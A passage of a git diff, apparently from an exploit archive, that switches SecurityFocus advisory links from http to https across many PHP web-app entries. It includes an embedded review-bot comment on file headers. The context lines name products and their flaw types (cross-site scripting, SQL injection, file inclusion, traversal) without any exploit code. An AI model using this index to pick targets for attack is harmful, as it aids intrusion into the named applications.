@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17522/info +source: https://www.securityfocus.com/bid/17522/info The ar-blog application is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27643.php b/exploits/php/webapps/27643.php index e16ddb096..406c1b4d4 100644 --- a/exploits/php/webapps/27643.php +++ b/exploits/php/webapps/27643.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17526/info +source: https://www.securityfocus.com/bid/17526/info phpAlbum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27644.txt b/exploits/php/webapps/27644.txt index b9722a5d6..9f30cb724 100644 --- a/exploits/php/webapps/27644.txt +++ b/exploits/php/webapps/27644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17527/info +source: https://www.securityfocus.com/bid/17527/info PlanetSearch + is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27645.txt b/exploits/php/webapps/27645.txt index 8abad3e1a..2176a8f63 100644 --- a/exploits/php/webapps/27645.txt +++ b/exploits/php/webapps/27645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17528/info +source: https://www.securityfocus.com/bid/17528/info PowerClan is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27646.txt b/exploits/php/webapps/27646.txt index 7c7ff13e7..8518d09d6 100644 --- a/exploits/php/webapps/27646.txt +++ b/exploits/php/webapps/27646.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17529/info +source: https://www.securityfocus.com/bid/17529/info LifeType is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27647.txt b/exploits/php/webapps/27647.txt index 5fbe862fe..5c15f534d 100644 --- a/exploits/php/webapps/27647.txt +++ b/exploits/php/webapps/27647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17530/info +source: https://www.securityfocus.com/bid/17530/info Papoo is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27648.txt b/exploits/php/webapps/27648.txt index 7211e9f31..9bee979c8 100644 --- a/exploits/php/webapps/27648.txt +++ b/exploits/php/webapps/27648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17532/info +source: https://www.securityfocus.com/bid/17532/info MODxCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27649.txt b/exploits/php/webapps/27649.txt index 2b247fe9b..7b69092f8 100644 --- a/exploits/php/webapps/27649.txt +++ b/exploits/php/webapps/27649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17533/info +source: https://www.securityfocus.com/bid/17533/info MODxCMS is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27650.txt b/exploits/php/webapps/27650.txt index 2dc38df9d..2bfa66465 100644 --- a/exploits/php/webapps/27650.txt +++ b/exploits/php/webapps/27650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17534/info +source: https://www.securityfocus.com/bid/17534/info FarsiNews is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
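Review bot: in exploits/php/webapps/27638.pl the rewritten line 1 is still a bare `source: https://www.securityfocus.com/bid/17501/info`, which is neither a shebang nor a `#` comment, while the index line keeps the file at mode 100755. Since the line is being touched anyway, either prefix it and the description text under it with `#` so the file parses as Perl, or drop the executable bit so the entry is clearly a text record. 27643.php has the same shape: its `source:` line is line 1, so no `<?php` tag precedes it and PHP would emit it as output; putting the header inside a comment block would avoid that.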
diff --git a/exploits/php/webapps/27651.txt b/exploits/php/webapps/27651.txt index 7c7140649..7d36ccdde 100644 --- a/exploits/php/webapps/27651.txt +++ b/exploits/php/webapps/27651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17536/info +source: https://www.securityfocus.com/bid/17536/info Tiny Web Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27658.txt b/exploits/php/webapps/27658.txt index 8ce338a30..f6f4615d9 100644 --- a/exploits/php/webapps/27658.txt +++ b/exploits/php/webapps/27658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17537/info +source: https://www.securityfocus.com/bid/17537/info phpGuestbook is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27659.txt b/exploits/php/webapps/27659.txt index dc98dc983..c52cc3242 100644 --- a/exploits/php/webapps/27659.txt +++ b/exploits/php/webapps/27659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17542/info +source: https://www.securityfocus.com/bid/17542/info phpFaber TopSites is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27660.txt b/exploits/php/webapps/27660.txt index a8c247343..dbf49f313 100644 --- a/exploits/php/webapps/27660.txt +++ b/exploits/php/webapps/27660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17546/info +source: https://www.securityfocus.com/bid/17546/info Monster Top List is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27661.txt b/exploits/php/webapps/27661.txt index a488b35bf..c2a786ea1 100644 --- a/exploits/php/webapps/27661.txt 
+++ b/exploits/php/webapps/27661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17553/info +source: https://www.securityfocus.com/bid/17553/info TinyPHPForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27662.txt b/exploits/php/webapps/27662.txt index 514b21cb5..16e12fa39 100644 --- a/exploits/php/webapps/27662.txt +++ b/exploits/php/webapps/27662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17554/info +source: https://www.securityfocus.com/bid/17554/info Blur6ex is prone to a local file-include vulnerability that may allow an unauthorized user to view files and to execute local scripts. diff --git a/exploits/php/webapps/27663.txt b/exploits/php/webapps/27663.txt index b0dedf482..66b1a4915 100644 --- a/exploits/php/webapps/27663.txt +++ b/exploits/php/webapps/27663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17559/info +source: https://www.securityfocus.com/bid/17559/info DbbS is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and command-execution vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27664.txt b/exploits/php/webapps/27664.txt index 807feeb8f..e36b5b53a 100644 --- a/exploits/php/webapps/27664.txt +++ b/exploits/php/webapps/27664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17560/info +source: https://www.securityfocus.com/bid/17560/info Jax Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27665.txt b/exploits/php/webapps/27665.txt index 9c7cb2d8d..1c4f4d18d 100644 --- a/exploits/php/webapps/27665.txt +++ b/exploits/php/webapps/27665.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17562/info +source: https://www.securityfocus.com/bid/17562/info Calendarix is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27666.txt b/exploits/php/webapps/27666.txt index 6e9aec805..37edb4cc3 100644 --- a/exploits/php/webapps/27666.txt +++ b/exploits/php/webapps/27666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17563/info +source: https://www.securityfocus.com/bid/17563/info Manila is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27667.txt b/exploits/php/webapps/27667.txt index 17121ab48..4d0d4e04f 100644 --- a/exploits/php/webapps/27667.txt +++ b/exploits/php/webapps/27667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17564/info +source: https://www.securityfocus.com/bid/17564/info MyBB is prone to a vulnerability that permits an attacker to overwrite global variables. This issue is due to a design flaw in handling HTTP GET and POST variables. diff --git a/exploits/php/webapps/27669.txt b/exploits/php/webapps/27669.txt index c193937d5..4aea962c8 100644 --- a/exploits/php/webapps/27669.txt +++ b/exploits/php/webapps/27669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17570/info +source: https://www.securityfocus.com/bid/17570/info Coppermine is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. diff --git a/exploits/php/webapps/27673.txt b/exploits/php/webapps/27673.txt index c97b6c079..deb78040a 100644 --- a/exploits/php/webapps/27673.txt +++ b/exploits/php/webapps/27673.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17586/info +source: https://www.securityfocus.com/bid/17586/info The phpLinks application is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27674.txt b/exploits/php/webapps/27674.txt index 9cfa65d7d..a9de13eb3 100644 --- a/exploits/php/webapps/27674.txt +++ b/exploits/php/webapps/27674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17588/info +source: https://www.securityfocus.com/bid/17588/info RechnungsZentrale V2 is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27675.txt b/exploits/php/webapps/27675.txt index dc78bafe0..5c1b47edd 100644 --- a/exploits/php/webapps/27675.txt +++ b/exploits/php/webapps/27675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17591/info +source: https://www.securityfocus.com/bid/17591/info phpLister is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27676.txt b/exploits/php/webapps/27676.txt index d4e784a7c..34bbb92ff 100644 --- a/exploits/php/webapps/27676.txt +++ b/exploits/php/webapps/27676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17592/info +source: https://www.securityfocus.com/bid/17592/info CuteNews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27677.txt b/exploits/php/webapps/27677.txt index 0d590deb9..f549dd5b2 100644 --- a/exploits/php/webapps/27677.txt +++ b/exploits/php/webapps/27677.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17595/info +source: https://www.securityfocus.com/bid/17595/info Article Publisher Pro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27678.txt b/exploits/php/webapps/27678.txt index ad05d8cf1..edd01df31 100644 --- a/exploits/php/webapps/27678.txt +++ b/exploits/php/webapps/27678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17596/info +source: https://www.securityfocus.com/bid/17596/info ModernBill is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27687.txt b/exploits/php/webapps/27687.txt index fa6c1c40e..4f573cd7c 100644 --- a/exploits/php/webapps/27687.txt +++ b/exploits/php/webapps/27687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17606/info +source: https://www.securityfocus.com/bid/17606/info ThWboard is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27688.txt b/exploits/php/webapps/27688.txt index a228a50d2..4702fc1d2 100644 --- a/exploits/php/webapps/27688.txt +++ b/exploits/php/webapps/27688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17612/info +source: https://www.securityfocus.com/bid/17612/info ContentBoxx is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27692.txt b/exploits/php/webapps/27692.txt index 4ce783a7a..bcacc3ccc 100644 --- a/exploits/php/webapps/27692.txt +++ b/exploits/php/webapps/27692.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17617/info +source: https://www.securityfocus.com/bid/17617/info Plexum is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27693.txt b/exploits/php/webapps/27693.txt index 11b7fd111..9ccb84945 100644 --- a/exploits/php/webapps/27693.txt +++ b/exploits/php/webapps/27693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17618/info +source: https://www.securityfocus.com/bid/17618/info TotalCalendar is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27707.txt b/exploits/php/webapps/27707.txt index 439297789..0b3a4cc8c 100644 --- a/exploits/php/webapps/27707.txt +++ b/exploits/php/webapps/27707.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17623/info +source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27709.txt b/exploits/php/webapps/27709.txt index 4c8b82696..1b1fc9c5e 100644 --- a/exploits/php/webapps/27709.txt +++ b/exploits/php/webapps/27709.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17625/info +source: https://www.securityfocus.com/bid/17625/info 4images is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27710.txt b/exploits/php/webapps/27710.txt index 12f4aac86..552415d78 100644 --- a/exploits/php/webapps/27710.txt +++ b/exploits/php/webapps/27710.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17626/info +source: https://www.securityfocus.com/bid/17626/info W2B Online Banking is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27711.txt b/exploits/php/webapps/27711.txt index f8135b53f..42efbc2a2 100644 --- a/exploits/php/webapps/27711.txt +++ b/exploits/php/webapps/27711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17627/info +source: https://www.securityfocus.com/bid/17627/info ThWboard is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27713.txt b/exploits/php/webapps/27713.txt index 765cf8d2e..9e914c2c3 100644 --- a/exploits/php/webapps/27713.txt +++ b/exploits/php/webapps/27713.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17630/info +source: https://www.securityfocus.com/bid/17630/info MWGuest is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27717.txt b/exploits/php/webapps/27717.txt index ffb6b89fd..961ddff03 100644 --- a/exploits/php/webapps/27717.txt +++ b/exploits/php/webapps/27717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27718.txt b/exploits/php/webapps/27718.txt index 852807926..281e7197b 100644 --- a/exploits/php/webapps/27718.txt +++ b/exploits/php/webapps/27718.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27719.txt b/exploits/php/webapps/27719.txt index e534be728..f6ce6f362 100644 --- a/exploits/php/webapps/27719.txt +++ b/exploits/php/webapps/27719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27721.txt b/exploits/php/webapps/27721.txt index 3293df03e..067974c03 100644 --- a/exploits/php/webapps/27721.txt +++ b/exploits/php/webapps/27721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27722.txt b/exploits/php/webapps/27722.txt index 5dbf1726f..9bc30d0ed 100644 --- a/exploits/php/webapps/27722.txt +++ b/exploits/php/webapps/27722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17643/info +source: https://www.securityfocus.com/bid/17643/info PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27724.txt b/exploits/php/webapps/27724.txt index 3447c2577..d0cc036e0 100644 --- a/exploits/php/webapps/27724.txt +++ b/exploits/php/webapps/27724.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17649/info +source: https://www.securityfocus.com/bid/17649/info Scry Gallery is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27725.txt b/exploits/php/webapps/27725.txt index 32b519573..e97cf895c 100644 --- a/exploits/php/webapps/27725.txt +++ b/exploits/php/webapps/27725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17651/info +source: https://www.securityfocus.com/bid/17651/info MKPortal is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27726.txt b/exploits/php/webapps/27726.txt index 27cd2e4fb..dc0a3bc1a 100644 --- a/exploits/php/webapps/27726.txt +++ b/exploits/php/webapps/27726.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17653/info +source: https://www.securityfocus.com/bid/17653/info Simplog is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27729.txt b/exploits/php/webapps/27729.txt index a25ea75a7..b34bb3c0b 100644 --- a/exploits/php/webapps/27729.txt +++ b/exploits/php/webapps/27729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17668/info +source: https://www.securityfocus.com/bid/17668/info Scry Gallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27731.txt b/exploits/php/webapps/27731.txt index c8a7c0bd1..a56fd6963 100644 --- a/exploits/php/webapps/27731.txt +++ b/exploits/php/webapps/27731.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17683/info +source: https://www.securityfocus.com/bid/17683/info Photokorn is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27732.txt b/exploits/php/webapps/27732.txt index bd7954894..54c501fdb 100644 --- a/exploits/php/webapps/27732.txt +++ b/exploits/php/webapps/27732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17683/info +source: https://www.securityfocus.com/bid/17683/info Photokorn is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27733.txt b/exploits/php/webapps/27733.txt index a44898a4b..3fd092212 100644 --- a/exploits/php/webapps/27733.txt +++ b/exploits/php/webapps/27733.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17683/info +source: https://www.securityfocus.com/bid/17683/info Photokorn is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27734.txt b/exploits/php/webapps/27734.txt index 0aea6c7f8..e5af537e7 100644 --- a/exploits/php/webapps/27734.txt +++ b/exploits/php/webapps/27734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17685/info +source: https://www.securityfocus.com/bid/17685/info NextAge Shopping Cart is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/27735.txt b/exploits/php/webapps/27735.txt index cb9664c80..9af7b476e 100644 --- a/exploits/php/webapps/27735.txt +++ b/exploits/php/webapps/27735.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17688/info +source: https://www.securityfocus.com/bid/17688/info phpWebFTP is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input using the HTTP 'POST' method when submitting a malicious URI. diff --git a/exploits/php/webapps/27736.txt b/exploits/php/webapps/27736.txt index b377ba1c5..ba396af45 100644 --- a/exploits/php/webapps/27736.txt +++ b/exploits/php/webapps/27736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17690/info +source: https://www.securityfocus.com/bid/17690/info Invision Power Board is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27737.txt b/exploits/php/webapps/27737.txt index 572f733c1..1bbd19f35 100644 --- a/exploits/php/webapps/27737.txt +++ b/exploits/php/webapps/27737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17696/info +source: https://www.securityfocus.com/bid/17696/info Instant Photo Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27738.txt b/exploits/php/webapps/27738.txt index a3dcd2d15..758c09e4e 100644 --- a/exploits/php/webapps/27738.txt +++ b/exploits/php/webapps/27738.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17696/info +source: https://www.securityfocus.com/bid/17696/info Instant Photo Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27739.txt b/exploits/php/webapps/27739.txt index 64d9bca4f..ad05d6bf2 100644 --- a/exploits/php/webapps/27739.txt +++ b/exploits/php/webapps/27739.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17696/info +source: https://www.securityfocus.com/bid/17696/info Instant Photo Gallery is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27740.txt b/exploits/php/webapps/27740.txt index 0c0ea58e8..5e8d1dc79 100644 --- a/exploits/php/webapps/27740.txt +++ b/exploits/php/webapps/27740.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17700/info +source: https://www.securityfocus.com/bid/17700/info CuteNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27741.txt b/exploits/php/webapps/27741.txt index 11a52cd17..c2f227f20 100644 --- a/exploits/php/webapps/27741.txt +++ b/exploits/php/webapps/27741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17701/info +source: https://www.securityfocus.com/bid/17701/info FarsiNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27742.txt b/exploits/php/webapps/27742.txt index 015a4b864..0f81d629a 100644 --- a/exploits/php/webapps/27742.txt +++ b/exploits/php/webapps/27742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17703/info +source: https://www.securityfocus.com/bid/17703/info DevBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27743.txt b/exploits/php/webapps/27743.txt index c8ef552e3..a2b5465af 100644 --- a/exploits/php/webapps/27743.txt +++ b/exploits/php/webapps/27743.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17707/info +source: https://www.securityfocus.com/bid/17707/info MySmartBB is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27763.php b/exploits/php/webapps/27763.php index 5508dd785..a6945a977 100644 --- a/exploits/php/webapps/27763.php +++ b/exploits/php/webapps/27763.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17731/info +source: https://www.securityfocus.com/bid/17731/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27767.txt b/exploits/php/webapps/27767.txt index 22c450e55..e6760773e 100644 --- a/exploits/php/webapps/27767.txt +++ b/exploits/php/webapps/27767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17736/info +source: https://www.securityfocus.com/bid/17736/info Artmedic Event is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27768.php b/exploits/php/webapps/27768.php index a1fc272eb..3e42772b1 100644 --- a/exploits/php/webapps/27768.php +++ b/exploits/php/webapps/27768.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17738/info +source: https://www.securityfocus.com/bid/17738/info CoolMenus is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27770.txt b/exploits/php/webapps/27770.txt index 89a2d3614..da17deb27 100644 --- a/exploits/php/webapps/27770.txt +++ b/exploits/php/webapps/27770.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17744/info +source: https://www.securityfocus.com/bid/17744/info Blog Mod is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27779.txt b/exploits/php/webapps/27779.txt index 7be3df89d..f0216ac5a 100644 --- a/exploits/php/webapps/27779.txt +++ b/exploits/php/webapps/27779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17745/info +source: https://www.securityfocus.com/bid/17745/info Advanced GuestBook for phpBB is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27780.txt b/exploits/php/webapps/27780.txt index d8e97a172..17fdc3b54 100644 --- a/exploits/php/webapps/27780.txt +++ b/exploits/php/webapps/27780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17748/info +source: https://www.securityfocus.com/bid/17748/info 4Images is prone to multiple, unspecified SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27781.txt b/exploits/php/webapps/27781.txt index d54ef2d3c..2df68bd56 100644 --- a/exploits/php/webapps/27781.txt +++ b/exploits/php/webapps/27781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17748/info +source: https://www.securityfocus.com/bid/17748/info 4Images is prone to multiple, unspecified SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27782.txt b/exploits/php/webapps/27782.txt index 102ab821c..c81e6762d 100644 --- a/exploits/php/webapps/27782.txt +++ b/exploits/php/webapps/27782.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17750/info +source: https://www.securityfocus.com/bid/17750/info TextFileBB is prone to multiple script-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated content. diff --git a/exploits/php/webapps/27783.txt b/exploits/php/webapps/27783.txt index c82bf96d2..e7f7f7c28 100644 --- a/exploits/php/webapps/27783.txt +++ b/exploits/php/webapps/27783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17751/info +source: https://www.securityfocus.com/bid/17751/info W-Agora is prone to a script-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generated content. diff --git a/exploits/php/webapps/27784.txt b/exploits/php/webapps/27784.txt index 4400337c3..02574dcaa 100644 --- a/exploits/php/webapps/27784.txt +++ b/exploits/php/webapps/27784.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17753/info +source: https://www.securityfocus.com/bid/17753/info PlanetGallery is prone to an authentication-bypass vulnerability. The issue occurs because the affected script fails to prompt for authentication credentials. diff --git a/exploits/php/webapps/27785.txt b/exploits/php/webapps/27785.txt index 948b24631..d399e0d2b 100644 --- a/exploits/php/webapps/27785.txt +++ b/exploits/php/webapps/27785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17756/info +source: https://www.securityfocus.com/bid/17756/info DMCounter is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27786.txt b/exploits/php/webapps/27786.txt index 1ab484111..c90486a4a 100644 --- a/exploits/php/webapps/27786.txt +++ b/exploits/php/webapps/27786.txt 
